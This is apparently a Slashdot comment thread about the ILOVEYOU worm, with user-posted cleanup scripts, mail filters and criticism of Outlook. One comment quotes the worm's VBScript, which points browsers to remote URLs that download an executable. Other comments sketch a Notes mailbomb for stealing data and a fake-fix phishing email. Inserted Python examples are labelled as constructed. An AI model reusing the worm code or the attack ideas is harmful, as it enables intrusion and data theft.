Then, to get rid of the virus that is already in your spool files (because if your users were smart enough not to click on it this wouldn't be such an epidemic). I've written a little Perl-diddy that acts like an anti-virus. Rudimentary usage tactics are in the comments. It will clean the user's spool file, removing all ILOVEYOU virus messages. Use and redistribute. It worked like a charm for me.
It is VITALLY important that you put the sendmail patch in place first.
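#!/usr/bin/perl
#
# kill_lover
#
# Author: Matt Luker, kostya@redstarhackers.com
#
# This little hack will iterate over a file, grabbing
# email messages. If the message is clean (i.e. not
# the ILOVEYOU), it is written to file. If it is not
# clean, it is thrown away.
#
# An extra file is generated, call $file.suspect. It
# may or may not have viruses in it. It is safe to
# delete it once you are done.
#
# I find the following command to work:
# cd
# find . -name \* -exec kill_lover.pl {} \;
#
use strict;
use warnings;

my $file=shift;
if (!defined $file || $file eq "") {
    print "Please enter a filename!\n";
    exit 1;
}
print "Looking for a lover in $file\n";
open MAILFILE, "<", $file or die "Cannot read $file: $!\n";
open CLEANSED, ">", "$file.clean" or die "Cannot write $file.clean: $!\n";
my $message="";
while (<MAILFILE>) {
    if (/^From /) {
        # Ok, we've found a message beginning, which means our
        # last message is done.
        check_message($message);
        $message=$_;
    } else {
        $message.=$_;
    }
}
# The last message in the file has no "From " line after it,
# so it has to be checked here or it would be lost.
check_message($message);
close CLEANSED;
close MAILFILE;
# rename() instead of backticked mv, so odd characters in a
# filename are never passed to a shell.
rename $file, "$file.suspect" or die "Cannot rename $file: $!\n";
rename "$file.clean", $file or die "Cannot rename $file.clean: $!\n";

# Write the message to the cleansed file unless it is the
# ILOVEYOU virus.
sub check_message {
    my ($msg) = @_;
    return if $msg eq "";
    if ($msg=~/Subject: ILOVEYOU/) {
        # This is a potential ILOVEYOU virus
        print "Killing a lover\n";
    } else {
        print CLEANSED $msg;
    }
}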
Enjoy!
"Doubt your doubts and believe your beliefs." -- Switchfoot, Ode to Chin
Someone has posted a recipe for postfix here
I'm told you can just adapt the Melissa one for sendmail
Here is the recipe for exim
You need to call this filter from your config file, so add
to the main section - remember to HUP or restart exim after this.
The list archives have some ongoing discussion on this - including some more devious filters for VBS scripts.
I didn't get a copy either.
We put in email filters to stop the propagation of the virus. I put in an exception for email to me. We've caught tens of thousands of emails but still not a single one for me.
here's one for your /etc/procmailrc if you're using procmail on your server. even though it's not going to affect non windows people, it's nice sometimes to protect your customers and/or clients that are...
# discard any message whose Subject header matches
# (delivering to /dev/null needs no lockfile)
:0
* ^Subject:.*I.*LOVE.*YOU
/dev/null
many variants can be made... this is the quick and dirty version that i did, and it gets the job done. drop it into /etc/procmailrc
"Here's 50 bucks, take this in case I get drunk and call you a bitch later." - Ricky (Vince Vaughn), Made (2001)
Also, a computer system should have some semblance of security against stupid actions by ordinary users. After all, we all do stupid things at one time or another. At the very minimum, the OS should differentiate between superuser and ordinary mode. Even if it doesn't require a password (I am thinking single-user Macs or Windows), at least the user would get a warning before something happened.
Finally, why are we stupid enough to put up with this stuff? We should demand better.
It's not the user's fault that their crappy MS software allows programs to be embedded in email and then executed when you read the damn things.
Besides which, 99% of people using computers don't understand what they are doing anymore than people really understand their car engine; should nobody use computers unless they can explain every line of code in Word?
TWW
"Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
Hmmm... Maybe Microsoft should --innovate-- some security features into Outlook.
-- Phenym
The preview pane will not activate it unless you are the lamest Sysadmin on the planet! you should have long long ago fixed your outlook to NOT use word as the reader, do not execute anything, and basically turn off all of the backdoors that microsoft put in that they call "features" but we know were put there to snoop/attack your pc.
If your users tell you all I did was put the mouse over it they are lying (users lie 100% of the time... get used to it) or you had their outlook configured to activate every file it gets.
Do not look at laser with remaining good eye.
Caution and warning.
This trojan will propagate to FAX machines, if the machine is a contact in the Outlook address book.
It doesn't just eat bandwidth, it eats paper and phone connections too.
-- What you do today will cost you a day of your life.
I have received so many spam mails about non-existent viruses, that I make it a practice to educate all my friends, family, staff and partners to CHECK IT OUT FIRST (i.e.: find supporting documentation on the Symantec Anti-Virus research page) before mailing everybody in their address book. The more people I point in this direction, the less spam I get about viruses. Remember the Frog game that was supposed to be a virus? I received over 150 emails about that one alone.
We have to remember that most people really don't know about such things, and honestly think they're doing everyone a favour with these email notifications. Let a person send email ad-hoc, and they'll send everything to everyone; teach them how to be responsible users and distributors of information, and the spam traffic will drop dramatically.
My 2 cents
"Content's a bitch."
In case anyone reads that and wonders, there's no chance of those spreading or doing anything. We were very careful about not letting those critters escape. Aside from that, they wouldn't have worked outside of our organization (Notes "/O=" organization, that is), would be stripped out by a Notes MTA-SMTP gateway so they couldn't travel the net, didn't destroy files (well, except unsaved work :), and had to be opened in Notes to run. So there's no possible virus danger or scare there, lest anyone wonder.
The following batch file syntax will remove ILOVEU from a WinNT machine, and show you all the damaged files. Perhaps someone can post a version for Win9X? Anyone have any improvements or suggestions?
Garrett
==== cut here and paste into a .cmd file ====
@echo off
rem Check for the worm's dropped copy in the Windows directory
if exist %SYSTEMROOT%\win32dll.vbs echo You were infected with love!
if not exist %SYSTEMROOT%\win32dll.vbs echo You aren't infected...
if not exist %SYSTEMROOT%\win32dll.vbs GOTO END
rem Delete the dropped files
if exist %SYSTEMROOT%\win32dll.vbs del %SYSTEMROOT%\win32dll.vbs
if exist %SYSTEMROOT%\system32\mskernel32.vbs del %SYSTEMROOT%\system32\mskernel32.vbs
if exist %SYSTEMROOT%\system32\love-letter-for-you.txt.vbs del %SYSTEMROOT%\system32\love-letter-for-you.txt.vbs
if exist %SYSTEMROOT%\system32\love-letter-for-you.htm del %SYSTEMROOT%\system32\love-letter-for-you.htm
rem Build a temporary .inf that removes the two autostart registry values
echo [version] > %TEMP%\ihateu.inf
echo signature="$Windows NT$" >> %TEMP%\ihateu.inf
echo. >> %TEMP%\ihateu.inf
echo [DefaultInstall] >> %TEMP%\ihateu.inf
echo DelReg=KeyToRemove >> %TEMP%\ihateu.inf
echo. >> %TEMP%\ihateu.inf
echo [KeyToRemove] >> %TEMP%\ihateu.inf
echo HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run","MSKernel32",, >> %TEMP%\ihateu.inf
echo HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices","Win32DLL",, >> %TEMP%\ihateu.inf
%SYSTEMROOT%\system32\Rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %TEMP%\ihateu.inf
del %TEMP%\ihateu.inf
echo Love has been eradicated from this computer...
echo.
echo Let's find files that may have been infected
echo This will search all local and networked drives
echo So be prepared to wait.
echo.
echo Recommendation: Delete all files listed
echo.
echo Results will be written to IHATE.TXT
echo.
echo.>IHATE.TXT
rem Search each drive by full path instead of changing drive and directory,
rem so IHATE.TMP and IHATE.TXT always stay in the starting directory
for %%x in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%x:\nul (
echo Searching %%x:
dir /s /b %%x:\*.vbs > IHATE.TMP
type IHATE.TMP
type IHATE.TMP >> IHATE.TXT
)
del IHATE.TMP
:END
echo Finished.
Life is like an egg better scrambled than fried. -- Ken Sawatari
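The batch file above lists every *.vbs file on every drive, which also catches legitimate scripts. The following is an added example (not from the thread) that instead finds files byte-identical to a known copy of the worm and classifies them using the MP3 and JPEG behaviour described in the thread. It assumes every copy matches the reference file you pass in; the function names and sample tree are constructed for illustration.

```python
import hashlib
import os
import tempfile

COMPANION_EXTS = {"mp3", "mp2"}  # per the thread: A.mp3.vbs is added, A.mp3 is kept
REPLACED_EXTS = {"jpg", "jpeg"}  # per the thread: A.jpg.vbs is written, A.jpg is deleted


def sha256_of(path):
    """Hash a file in chunks so large media files are not read into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def classify(path):
    """Verdict for a file already known to be byte-identical to the worm copy."""
    parts = os.path.basename(path).lower().split(".")
    if len(parts) >= 3 and parts[-1] == "vbs":
        inner = parts[-2]
        original = path[:-len(".vbs")]
        if inner in COMPANION_EXTS:
            if os.path.exists(original):
                return "companion: original present, delete the .vbs and unhide the original"
            return "companion: original missing"
        if inner in REPLACED_EXTS:
            return "replacement: original deleted, restore from backup"
    return "worm copy: dropped file or overwritten in place"


def triage(root, reference_copy):
    """Return sorted [(relative path, verdict)] for each copy of reference_copy under root."""
    ref_size = os.path.getsize(reference_copy)
    ref_hash = sha256_of(reference_copy)
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                # Cheap size comparison first; only same-sized files get hashed.
                if os.path.getsize(path) != ref_size or sha256_of(path) != ref_hash:
                    continue
            except OSError:
                continue  # unreadable file: skip it
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            findings.append((rel, classify(path)))
    return sorted(findings)


def build_sample_tree(root):
    """Create a CONSTRUCTED tree; the 'worm' bytes are an inert stand-in."""
    worm = b"inert stand-in for the worm script\n"
    files = {
        "windows/win32dll.vbs": worm,          # dropped copy, used as the reference
        "music/Bobs.mp3": b"original audio",   # original kept next to its companion
        "music/Bobs.mp3.vbs": worm,
        "pics/holiday.jpg.vbs": worm,          # original holiday.jpg is gone
        "web/menu.js": worm,                   # overwritten in place
        "admin/logon.vbs": b"x" * len(worm),   # legitimate script of the same size
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return os.path.join(root, "windows", "win32dll.vbs")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        reference = build_sample_tree(tmp)
        for rel, verdict in triage(tmp, reference):
            print(f"{rel}: {verdict}")
```

A later variant with different bytes will not match the reference hash, so the reference copy has to come from the machine being cleaned.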
Apparently Lloyds bank here in the UK has been hit by this.
It looks much worse than melissa and I am sure somebody will change the subject line / content of the message to lure more clueless lusers.
All those years of using Windows has done one thing for me. I fixed this threat before it happened at my company.
The fix is actually quite easy, and will work until the next version comes out. All I did was use the MS Outlook "rules system" to create a "rule" that deleted any messages with an "ILOVEYOU" subject. My users never saw the message at all.
It did come a little too late. One of the execs lost 4500 JPGs from his hard drive. Wonder what THOSE could've been? (EG)
I'm just kidding. They were just his vacation pics.
Stupid Users.. Thank God I installed virus checker, Stupid users.. Thank Go...
Well you get the idea. How many fsking times do you have to say "DON'T DOWNLOAD UNKNOWN ATTACHMENTS" before people figure that they are not supposed to do so?
I don't need a million points of light, just two points of multi-mode fiber and a 10 Gig-E router.
n/t
--
Peace,
Lord Omlette
AOL IM: jeanlucpikachu
[o]_O
I believe Word Perfect 2000 will be adopting VBScript as its macro language. So then we can have mail viruses on Linux too.
Not many industry standards come from Redmond. I guess virus-capable mail and ODBC will be the two big ones they'll be remembered for.
I think the most disturbing thing about this is that it can actually be done! I've taken a look through the script and I can't believe that such loopholes are present in the system. Take the registry stuff- an ordinary program with no privileges at all can just fiddle around with vital system variables with devastating results. Then there's the matter of plonking files in system directories without even the vaguest thought about what they are. Right, I think I'll stick my root password on my monitor and set all my system files to a+rw. We can't have secure systems, can we?
This will probably be lost in all the comments but, I have figured out how to stop this virus cold.
Rename wscript.exe to wscript.bak or delete it completely to keep this virus from spreading.
Then clean the registry and inbox/outbox.
Delete all the files it changed.
Set whatever mail server you are using to reject any mail attachments with a .vbs or .vbe extension.
ILOVEYOU - NOT ANYMORE!
The virus only hates Windows (and mail servers). It loves my Mac (or at least it does no harm) and I assume it doesn't harm Linux either.
Uh-huh.
:-)
And are you maybe now realizing that it's probably not different -- the person who posted the source code probably did exactly the same thing and had the tag stripped out of his post as well?
--
It's a fine line between trolling and karma-whoring... and I think I just crossed it.
- Sean
This has happened before (Melissa, etc.) and it will happen again. Anyone still using such obviously problematic software (MS Outlook) deserves what they get.
--
Tired of FB/Google censorship? Visit UNCENSORED!
Oh that's brilliant. Move to an OS which will allow for you to run programs at a different user level.
She should know that you don't run unfamiliar attachments except in a highly secured guest account. And that you don't give your daily account admin permission.
If he won't let her post it on her corporate network, will she at least release it to the rest of the internet? It would solve so many problems....
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
Right - luckily enough, I work for the company with the largest Notes userbase anywhere (clue?). I just received this message from one of our other offices:
Within the last one and one half hours, we have recd. multiple requests to print and/or translate the below referenced file into something legible.
Now, first of all, this is wonderful - these people can't actually open the 'LOVE-LETTER-FOR-YOU.TXT.vbs' attachment, because they're all using Notes. On the other hand, many many people wanted to!!
I have now lost my faith in humanity's ability to survive - I hold on because I still think chaos theory is viable.
ert.
[|]
richi.
We had (1) a message in e-mail warning of the virus, and (2) a voice-mail warning of the virus (actually two messages), and (3) signs taped at all the entrances to the building
We also HAD e-mail, but with a 32,000 entry company global address book, plus group mail addresses, that was quickly taken down when four people opened the attachment anyway...
Thanks, Bill. Love ya man...
here is my fix for the worm.
it removes the files and registry entries made by the worm. Also removes *.vbs copies from drives and unhides reverts *.mp(2|3)'s.
-If at first you don't succeed, call it version 1.0.
Sendmail, Inc., has posted a blocking configuration feature that enables sendmail mail servers to stop the "ILOVEYOU" virus from entering your computer network at the server level. This feature works on all versions of sendmail 8.9 and above.
You can find the details here.
If administrators add this feature to their sendmail gateways, it will slow the spread of this virus over the Internet.
It's not just the thing that Microsoft always manages it to produce software, that is not made for the daily use: They want to put all their new "innovations" in it, but while they are doing this, they forget important things: They don't fix the tons of bugs and they don't even think about security. But, after all, they don't make _that_ bad products. (oh-oh, I think with this sentence I might get many enemies on /. ;))
The true problem is, that over 90% of all PCs are running Windows - and most of them also OE and IE. And that's the only reason why this virus could so awfully fast spread over the world. If we would have more competition in the OS and browser markets, this could not have happened: If only every 4th PC or so (although I think this is still far too many :P) had been using Windows, we would not have had such a disaster now. And _that's_ why they should break up Microsoft.
You know. I feel so unloved because I seem not to be on anyone's address book. How sad.
However... I have decided to create a human version of this Trojan, and am currently walking around the office and calling people in my Visor's DB, telling people "ILOVEYOU!" and then urging them to do the same with everyone they know. The entire office is now full of chattering ILOVEYOU!s, and the phone system is about to collapse.
I hope to bring down Bell Atlantic, Sprint, MCI, and AT&T this way.
That'll teach them not to put me on their address book!
The possibility for Notes attacks is pretty much limited to 'internal' users. The default Execution Control List (ECL) allows any member of your /Org to run pretty much any script on your machine.
The one big hole in this scheme is that it allows former users to continue to run scripts after they have left the company. (Having old IDs 'in the wild' is pretty much inevitable for Notes shops.)
So I could write a Notes mailbomb, encapsulate it and the proper /O signature into an SMTP message, and mail into my former place of work. Blammo.
The best solution (I can think of) is to create an OU such as /Developers/Org, put all of the developers there, and only grant them access in the Domain ECL, and then make sure that *everything* is properly signed. This would limit normal users to some extent, but normal users really don't want this sort of macro functionality anyway.
Making things worse is the fact that there's lots of sensitive information in Notes systems, so tactics such as these would make wonderful industrial espionage devices. (One well crafted PostOpen event sent to the Director of HR could lead to the entire Salary database ending up in my Hotmail inbox.)
Right now Exchange/Outlook shops are pretty much limited to mail/calendar/discussion applications. But, Microsoft is building a more compelling groupware infrastructure on top of Exchange and Office. If anything, ILOVEYOU proves how easy it would be to conduct espionage activities against such shops -- just mail in a HTML message with a OLE Automation script embedded.
--
Business. Numbers. Money. People. Computer World.
Does anybody know where a good-hearted Linux user can get a copy of WIN-BUGSFIX.EXE?
I'm at home right now because my IT department got so paranoid they basically said don't use any program that uses the network. For my company, it will be a mess to clean up, and seeing that they think an AS/400 system needs to be isolated until this is over, it will be a while.
I checked my Outlook before leaving and only a few copies had made their way to me. Problem there though is any copy will use the Global Address book IT set up, and spam many thousands of accounts across several sites.
For any of you protecting your Exchange 5.5 server with Norton Antivirus (Symantec), there are signatures here. They aren't tested or approved, AFAIK, but they're working at my location. It won't repair the file but will quarantine bad attachments. You might want to keep the server off your network while you do this. Stop your store while you're copying the signature file to your server, then pull your ethernet cable when you want to start it again to run NAV.
That url is ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/specdef
Of course, this assumes that he's in a jurisdiction which doesn't have those pesky prohibitions against cruel and unusual punishment.
/.
/. If the government wants us to respect the law, it should set a better example.
Doesn't affect linux? Right.
Does affect MS Windows? Right.
What it is, and how to clean up the damage IS news.
As usual, /. seems to be the best available technical source for MS Windows. A search for ILOVEYOU on microsoft.com timed out with 0 results. You would think that by now they would have some clue as to what is going on.
Theres no better mail client for windows than outlook express? Come on. The only mail client I will ever use is Eudora.
Only the State obtains its revenue by coercion. - Murray Rothbard
At least it's open source.
The first, last, and only tech news site on the net
In the following code you can see that the trojan is setting IE's default page to one of four URL's that are a link to a file called WIN-BUGSFIX.EXE. I haven't been able to connect to any of the URL's at the user's home dir level yet because my request keeps timing out. Does anyone know what this file does? Is it just a way for the trojan to keep track of computers it has already run from?
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
  Randomize
  num = Int((4 * Rnd) + 1)
  if num = 1 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
  elseif num = 2 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
  elseif num = 3 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
  elseif num = 4 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
  end if
end if
I have a website. It's about Macs.
Destroys all MP3's on the system, hunh? Looks like Metallica is finally starting to wise up and fight dirty. . .
Lookout is actually the name that a lot of people use to refer to it internally at Microsoft. I think I even heard of a story where BillG referred to it as Lookout once... don't remember.
I have a website. It's about Macs.
Written by my colleague, use at your own risk. Subsequent version will delete the viral *.vbs files and un-hide the hidden MP3 files. This could be improved: but I figured, release early, release often!
' Written by nowickis@hotmail.com
' No warranties: This may ruin your entire life and cause massive damage, use at your own risk!
'
On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Set szDirWin = fso.GetSpecialFolder(0)
Set szDirSys = fso.GetSpecialFolder(1)
Set szDirTemp = fso.GetSpecialFolder(2)
set wscr=CreateObject("WScript.Shell")
'The virus creates several copies of itself. Delete them . . .
fso.DeleteFile szDirSys & "\MSKernel32.vbs"
fso.DeleteFile szDirWin & "\Win32DLL.vbs"
fso.DeleteFile szDirSys & "\LOVE-LETTER-FOR-YOU.TXT.vbs"
fso.DeleteFile szDirSys & "\LOVE-LETTER-FOR-YOU.HTM"
'It then sets these instances to run at start-up. Stop that from happening . . .
wscr.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32"
wscr.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL"
szDownloadFolder = wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (szDownloadFolder = "") then
  szDownloadFolder = "c:\"
end if
'The virus sets your IE homepage to point to an executable called WIN-BUGSFIX.exe and then sets that
'file to load at start up. I don't know what that file does, but it's probably not nice. Let's delete that
'one, too.
wscr.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX"
'Reset the IE home page . . .
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.microsoft.com/ie"
'That should do it. Any problems, check the web site of your anti-virus provider for additional help . . .
Now, my software happens to snag attachments and replace them with links, so this one didn't go anywhere, but someone did obediently go and acquire the pointed-to file before I removed read access. Fortunately, he was using Netscape, so nothing happened.
So here's my question: since mailing list users tend to blindly trust each other, and sometimes they do want to legitimately exchange executables, is there something I can run on the li'l ol' penguin-powered server that will detect (some, most, any) Windows viruses so I can protect these people from themselves?
(Yeah, some of them are morons. But, dangitall, they're my morons.)
Slashdot's token middle-aged housewife
So far only one news organization has gotten the story right. All the newscasts I've heard are leading with titles like "E-mail Virus Cripples Internet Users", none of them even mention that it's an MS-Outlook problem. This really irks me because they're missing the whole point that this is not an "Internet e-mail" virus it is a "Microsoft Outlook" virus. I felt vindicated 5 minutes ago when I heard on NPR's "All Things Considered" start off with the headline "Virus Inside Microsoft E-mail....". Congratulations NPR/All Things Considered for getting it right!
From: My Friend
Subject: Fix for "ILOVEYOU" virus
The IT department just received this patch from Microsoft which prevents the ILOVEYOU virus from infecting your computer. Double-click on the "ILOVEYOU.FIX" file to install the fix on your computer.
Attachment: ILOVEYOU.FIX.vbs
-----
Hey, it could happen! (I'm surprised it didn't)
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
I know this is a cliche, but where's the outrage? This is the *second* worldwide virus that uses the same type of security leak in 2 years. What I do see is lots of techies saying "I told you so," while the popular press is very uncritical of MS and Outlook. When will the press use words like 'very unsecure' when describing Outlook or just MS in general?
What do you think is the % of people who will quit using Outlook after being hit by this? 5% 1% 0%? If the press would do its job, namely informing and protecting the layman we'd see a lot less Outlook users. Instead we get 'don't open this mail, which is useless when the preview pane is always on' and 'all is well, download new virus updates, MS is still your friend.'
And here I thought that virus stories were "too good" for Slashdot.
A couple weeks ago, I submitted a story that was on CNN about a virus that will actually use your computers modem (if it has one) to dial 911.
The story was declined.
This seems a bit more important (at least, to me) than an 'annoying' 'virus'. This one has the potential to get you in to a bit of trouble. Not to mention you really don't want emergency crews knocking at your door.
I'm sorry. What I meant to say was 'please excuse me.'
what came out of my mouth was 'Move or I'll kill you!'
A new variant is already making the rounds. Does anyone know the best way to configure sendmail to reject ALL Visual Basic attachments?
The new variant uses a subject of "fwd: Joke"
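The subject-based filters posted in this thread stop matching once the subject changes, as with the "fwd: Joke" variant. The following is an added example (not code from the thread or from any mail server project) that scans an mbox spool by attachment filename instead; the extension set, function names and sample messages are assumptions constructed for illustration.

```python
import mailbox
import os
import tempfile
from email.errors import HeaderParseError
from email.header import decode_header, make_header
from email.message import EmailMessage

# Script types Windows runs on double-click, taken from the extension list in
# the thread. Assumption: this is the set the mail gateway should block.
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsh", "sct", "hta"}


def is_script_name(raw_name):
    """True if an attachment name would be opened as a script by Windows."""
    try:
        # Decode RFC 2047 encoded-words so encoding cannot hide the suffix.
        name = str(make_header(decode_header(raw_name)))
    except (HeaderParseError, LookupError, UnicodeError):
        name = raw_name
    # Windows drops trailing dots and spaces: "x.vbs. " still opens as .vbs.
    name = name.strip().rstrip(". ").lower()
    # Only the LAST extension picks the handler: "A.TXT.vbs" is a script.
    return "." in name and name.rpartition(".")[2] in SCRIPT_EXTS


def script_attachments(msg):
    """Filenames of all MIME parts in msg that carry a script name."""
    names = (part.get_filename() for part in msg.walk())
    return [n for n in names if n and is_script_name(n)]


def quarantine_scripts(src_path, clean_path, quarantine_path):
    """Split an mbox into clean and quarantined copies; the source is left untouched.

    Returns [(subject, [attachment names])] for each quarantined message.
    """
    src = mailbox.mbox(src_path, create=False)
    clean = mailbox.mbox(clean_path)
    quarantine = mailbox.mbox(quarantine_path)
    report = []
    try:
        for msg in src:
            hits = script_attachments(msg)
            if hits:
                quarantine.add(msg)
                report.append((msg.get("Subject", ""), hits))
            else:
                clean.add(msg)
    finally:
        for box in (clean, quarantine, src):
            box.close()  # close() flushes pending writes
    return report


def build_sample_mbox(path):
    """Write four CONSTRUCTED messages; attachment bytes are inert placeholders."""
    def make(subject, body, attachment=None):
        m = EmailMessage()
        m["From"] = "sender@example.com"
        m["To"] = "user@example.com"
        m["Subject"] = subject
        m.set_content(body)
        if attachment:
            m.add_attachment(b"placeholder, not worm code\n", maintype="application",
                             subtype="octet-stream", filename=attachment)
        return m

    box = mailbox.mbox(path)
    box.add(make("ILOVEYOU", "see attachment", "LOVE-LETTER-FOR-YOU.TXT.vbs"))
    box.add(make("fwd: Joke", "see attachment", "joke.vbs"))  # attachment name constructed
    # A reply that only quotes the subject: a body-wide subject grep would drop it.
    box.add(make("Re: ILOVEYOU", "> Subject: ILOVEYOU\nDon't open that one."))
    box.add(make("minutes", "see attachment", "minutes.txt"))
    box.close()


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        spool = os.path.join(tmp, "spool")
        build_sample_mbox(spool)
        for subject, names in quarantine_scripts(spool, spool + ".clean",
                                                 spool + ".quarantine"):
            print("quarantined:", subject, names)
```

Filtering on the filename only catches scripts sent under a script extension, so it complements a virus scanner rather than replacing one.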
. Rename the file to 'I HATE YOU'
. Change the wording in the body mesg: I HATE YOU!. If you lick on this icon, you will die!
. Make myself a nice lemonade and watch CNN until the report of the "newer and more powerful virus appears" comes up
. Wait until either
1: FBI agents knock on my doors OR
2: Die of old age.
I received the virus this morning, in my hotmail account. Hotmail has a feature to scan attachments automatically, but it didn't catch the virus (using a product from McAfee). However, the message was forwarded to me by a person, who knows diddly-squat about VBS and so, being the suspicious guy that I am, I saved the attachment to disk and opened it with EMACS instead. The scary part is that there are several users who trust their virus scanners to say that an attachment is safe to look at. I guess Microsoft had better update their virus scanner on Hotmail as soon as possible.
Without question here's the best way to protect against these kind of macro viiri if you're an Outlook user, it works for us:
How Active is Active Content in Email?
http://ntbugtraq.ntadvice.com/default.asp?sid=1&pid=47&aid=56
"Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
http://www.enme.ucalgary.ca/~nascheme/qmail-filter.py
In a week all the commotion will have died down, most copies of the virus / trojan horse / whatever will have been deleted and only a few will still be doing the rounds. But who, if anyone, should shoulder the blame for what has happened?
Obviously the prime contender is whoever wrote the script in the first place. It is fairly obvious that the intent was malicious, and after Melissa it is widely known what damage these sorts of things can do. But is it fair to pin all the blame here, after all after Melissa we all learnt our lesson, didn't we?
It would appear not, and we risk shooting the messenger. Is the real culprit Microsoft who has left the system so open to abuse? After all they wrote all the code with all the interoperability, and hence all the scope for the security breaches we are seeing. But why wire all the programs together, and make all of them work as one...
...unless it is something that the users have asked for? Could the desk jockeys be the problem, wanting all this ease of use and abstraction from the nitty-gritty, so that writing an email is just like a letter is just like all the rest? After all work is dull enough, let the Microserfs deal with all the boring computer jargon.
It is clear what will happen, and has already started to happen. The powers that be will press release that the villain is the author of the script, that (s)he has exploited security holes to disrupt society, and will be punished.
It will not occur to the media-at-large that perhaps the company that hasn't fixed the problems after Melissa could be to blame. That Microsoft could have been just a little bit negligent and perhaps should have to make an apology, or pay up some expenses.
Finally maybe the general users should get a stern word or two. If they want ease of use and security, they will have to kick up a fuss when they don't get it. How many people have complained to Microsoft as yet? Thought so.
In the end the blame will fall on one person, whereas it should fall on quite a few. Hopefully this time around some more heads will roll, and people will start to realise that software is just like any other commodity. If it doesn't work you get your money back, or you get compensation.
Fool me once, shame on you.
Fool me twice, shame on me.
Many PCS cell phones now have email to text message gateways, and I'm sure that some PCS phones' email addresses are in some peoples' lists...
Are we going to be hearing about PCS systems crashing under heavy load of I-LOVE-YOU text messages?
Tarsnap: Online backups for the truly paranoid
By installing Windows and clicking the usual "I agree not to ever sue MS ever" I'd guess most victims aren't able to sue MS over the lack of security in Outlook.
How about owners of unix mailservers? Do we have a right, having not agreed to the licence, to seek compensation for having our systems flooded due to Windows' poor security?
There was a semi-clever comment posted along with this story (as there are with many /. posts) regarding Microsoft and its products. As usual, it comes from an uninformed perspective.
The comment suggested that Windows has weak security and as a result, has too much virus activity, whereas an OS like Linux doesn't.
DUH!
How many of you remember any virii running under H-DOS or CP/M (how many of you even know what I'm talking about)? The reason Windows has virus issues is because it totally owns the OS market, as the DOJ has not-so-subtly revealed.
Linux doesn't have virus problems because nobody wants to waste their time on a virus that will affect less than 1% of corporate desktops.
Besides, nobody would release a Linux virus until it had been open-sourced, peer-checked, and incorporated into the next Linux distribution.
Destroys all your MP3s? I heard about this thing a while ago, I think it was called Project Zapster. It was done by some hacker group called the RIAA. Sneaky SOBs.
This one has been predicted ever since Melissa was released. Now we have one that does something dangerous, but it's still nowhere as bad as it could be. Next time it won't use an easily parsed subject line. Next time it won't go around erasing random files, it will just wait until a certain date and just nuke the entire computer.
Of course, I don't use outlook. Maybe during the long recovery process, other people will start to realize the disadvantages of it as well.
-Restil
Play with my webcams and lights here
How?!
The user saved the attachment on the unix server, ftp'd it to his windows box and ran it!
...are you stupid enough to run an attachment? No? OK then, is there anyone else at work stupid enough to run an attachment, and is your hard drive shared?
You are not me, therefore you are not important
I've put a script up here that removes the virus from unix mailspools.
I'm sure the author of this program is going to be extremely upset when he finds out about all the people illegally distributing his copyrighted work!
Maybe he can hire NetPD to find out who the people distributing his vb script are.
I hope this gets stopped before it sets more of a precedent for people to just ignore copyright laws.
Couldn't resist this: Here's Scott Culp, programming manager for Microsquish's security response center (Love that last line):
"Viruses are really an industry-wide issue," said Scott Culp, program manager for Microsoft's security response center. "They can be written for any platform. They can be written to use a variety of e-mail clients.
"In this case the virus author chose to target Outlook probably because it gave him better reach," he said. "There isn't a security vulnerability in Outlook involved in this at all," Culp said.
But what damage could a .sh do in, say, Pine?
Well, not a lot; the script would be shown; you have the option of viewing it and then, if you like, save and run....
But the fact is, any high-exposure software (mail-client, Napster, whatever) is vulnerable, not just because it runs under a single-user OS, but because it's a prime target; who'd bother exploiting a weakness in kmail / elm / pine / etc?
